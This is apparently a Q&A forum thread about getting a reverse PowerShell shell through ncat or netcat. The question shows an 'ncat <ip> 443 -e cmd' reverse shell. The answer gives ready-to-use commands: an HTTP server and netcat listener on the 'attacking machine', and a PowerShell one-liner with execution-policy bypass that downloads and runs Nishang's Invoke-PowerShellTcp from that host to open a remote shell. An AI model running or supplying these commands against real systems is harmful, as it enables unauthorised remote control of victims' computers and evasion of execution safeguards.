How to execute a reverse "Powershell shell" using ncat or netcat?
I am using ncat to execute a reverse "cmd" shell from one machine to another and without any issues using the commands:
In my machine: ncat -l 443
In the remote machine: ncat <my ip> 443 -e cmd
And all works flawlessly, however, I would very much prefer "powershell" to be executed instead of "cmd", for that I did this:
In my machine: ncat -l 443
In the remote machine: ncat <my ip> 443 -e powershell
But now a strange thing happens, the powershell prompt is given to the remote machine and not mine... This is the output:
In my machine: Windows Powershell
Copyright 2009 Microsoft Corporation. All rights reserverd. (and it hangs there)
In the remote machine: PS C:\Users\User> (the shell is actually given to the remote machine)
Is there a way to redirect that prompt to my machine again, and have the "powershell" shell in my machine as I did with the "cmd" shell? I searched for stdout redirection but could not make it work :(
Any help would be very much appreciated.
The reason that the Powershell hangs on the reverse shell of your attacking machine might be due to it not being fully interactive. Try to use PowerShell-based shells like Nishang's Invoke-PowerShellTcp. Download the .ps1 script on your attacking machine, run a HTTP server for the remote host to download the script from, then download it on the remote machine.
Setting up an HTTP server on your attacking machine using either Python 2 or Python 3
python -m SimpleHTTPServer [port]
python3 -m http.server [port]
Also on your attacking machine, run a netcat listener:
nc -lnvp [port2]
Then run this on the Command Prompt (cmd) of the remote machine
powershell.exe -nop -ep bypass -c "iex ((New-Object Net.WebClient).DownloadString('http://[your attacking machine's IP address]:[port1]/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress [your attacking machine's IP address] -Port [port2]"
The caught reverse shell on your netcat should now be fully interactive.